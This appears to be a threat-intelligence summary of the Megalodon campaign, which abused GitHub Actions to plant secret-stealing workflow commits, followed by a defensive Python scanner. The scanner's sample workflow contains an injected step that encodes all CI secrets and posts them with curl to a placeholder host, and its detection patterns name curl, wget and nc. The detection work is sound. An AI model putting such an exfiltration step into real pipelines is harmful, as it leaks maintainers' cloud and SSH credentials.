GitHub Actions abused by Megalodon attack to slip malicious commits into 5,500 repos
Summary
A campaign dubbed Megalodon has been observed abusing GitHub Actions to inject malicious commits into over 5,500 public repositories. These commits modify workflow files to steal secrets exposed during CI/CD execution, such as cloud credentials and SSH keys.
IFF Assessment
FOE
This campaign is a sophisticated software supply-chain attack that compromises CI/CD pipelines, working directly against defenders.
Defender Context
This incident highlights a significant threat to the software supply chain, where attackers can infiltrate repositories through CI/CD pipelines like GitHub Actions. Defenders should be vigilant about unexpected workflow dispatches and review audit logs for suspicious token requests to identify and mitigate such attacks.
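One way to act on the review guidance above, as an added example that is not from this write-up or from any of the reporting it summarises: a small Python scanner for GitHub Actions workflow files that flags lines where CI secrets are dumped, encoded, or handed to a network tool, which are the changes a defender would want a human to look at after an unexpected workflow commit. The heuristic rules, the sample workflow and the `example.invalid` host are constructed assumptions, not indicators from the campaign.

```python
import re
from typing import List, Tuple

# Constructed sample workflow: a normal build job plus one injected "Debug env"
# step of the kind a defender should flag. Line 13 references a secret the
# ordinary way (via env:) and must NOT be flagged.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - name: Debug env
        run: echo '${{ toJSON(secrets) }}' | base64 | curl -X POST --data-binary @- https://example.invalid/c
      - run: aws s3 cp ./dist s3://my-bucket --recursive
        env:
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
"""

# Heuristic patterns (hypothetical, tune for your own repositories).
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")   # ${{ secrets.NAME }}
SECRET_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)")                   # whole secrets context
NETWORK_TOOLS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")
ENCODERS = re.compile(r"\b(base64|xxd|openssl enc)\b")

def scan_workflow(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, stripped_line) for every suspicious line.

    Scanning is per physical line, so multi-line `run: |` blocks are covered too.
    A secret referenced only through an `env:` mapping triggers nothing on its own.
    """
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(text.splitlines(), 1):
        has_secret = bool(SECRET_REF.search(line) or SECRET_DUMP.search(line))
        if SECRET_DUMP.search(line):
            findings.append((n, "secrets-dump", line.strip()))
        if has_secret and NETWORK_TOOLS.search(line):
            findings.append((n, "secret-to-network", line.strip()))
        if has_secret and ENCODERS.search(line):
            findings.append((n, "secret-encoded", line.strip()))
    return findings

if __name__ == "__main__":
    for lineno, rule, content in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {rule}: {content}")
```

Run it against the `.github/workflows/*.yml` files touched by any commit you did not expect; a clean result is not proof of safety, only the absence of these specific patterns.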